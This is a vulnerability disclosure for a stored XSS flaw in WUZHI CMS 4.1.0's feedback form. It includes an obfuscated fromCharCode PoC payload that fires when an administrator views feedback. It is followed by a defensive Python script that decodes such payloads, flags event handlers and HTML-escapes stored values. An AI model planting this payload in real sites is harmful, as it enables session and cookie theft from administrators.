An XSS vulnerability was discovered in WUZHI CMS 4.1.0
There is a persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form[content] parameter in a POST to /wuzhicms/www/index.php?m=feedback&f=index&v=contact
When an administrator accesses Extension module - Content feedback, the XSS vulnerability is triggered successfully.
POC
hello,hello,<details/open/ontoggle=eval(String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(100)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(117)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(111)+String.fromCharCode(107)+String.fromCharCode(105)+String.fromCharCode(101)+String.fromCharCode(41))>hello,hello
Vulnerability trigger point
When an administrator accesses Extension module - Content feedback, the XSS vulnerability is triggered.
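For reviewing feedback entries that are already stored, the following added example (not part of the original report and not WUZHI CMS code) decodes String.fromCharCode chains of the kind used in the PoC, flags inline event handlers, and shows the HTML-encoded form that is safe to render. The function names and both sample strings are constructed for illustration.

```python
import html
import re

# One String.fromCharCode(n[, n...]) call, and a '+'-joined run of such calls.
_CALL = r"String\.fromCharCode\(\s*\d+(?:\s*,\s*\d+)*\s*\)"
_CHAIN = re.compile(_CALL + r"(?:\s*\+\s*" + _CALL + r")*")
_CODES = re.compile(r"\d+")
# Inline event handler inside a tag. '/' is accepted as a separator because
# browsers parse <details/open/ontoggle=...> even though it has no spaces.
_HANDLER = re.compile(r"<[a-zA-Z][^>]*?[\s/](on[a-zA-Z]+)\s*=", re.S)


def decode_charcode_chains(text):
    """Replace each fromCharCode chain with the string it evaluates to."""
    def _sub(match):
        # fromCharCode keeps only the low 16 bits of each argument.
        return "".join(chr(int(n) & 0xFFFF) for n in _CODES.findall(match.group(0)))
    return _CHAIN.sub(_sub, text)


def triage_feedback(content):
    """Return findings for one stored form[content] value."""
    decoded = decode_charcode_chains(content)
    return {
        "event_handlers": [h.lower() for h in _HANDLER.findall(content)],
        "obfuscated": decoded != content,
        "decoded": decoded,
        # What the admin view should emit instead of the raw value.
        "safe_html": html.escape(content, quote=True),
    }


# Constructed samples: same shape as the PoC, with a harmless alert(1) body.
_chain = "+".join(f"String.fromCharCode({ord(c)})" for c in "alert(1)")
SAMPLE_SUSPICIOUS = f"hello,<details/open/ontoggle=eval({_chain})>hello"
SAMPLE_BENIGN = "hello, the contact form works fine"

if __name__ == "__main__":
    for row in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        print(triage_feedback(row))
```

A keyword filter looking for `<script` or `alert(` never matches the raw value, which is why the check decodes first and why the rendered output should be the encoded `safe_html` form.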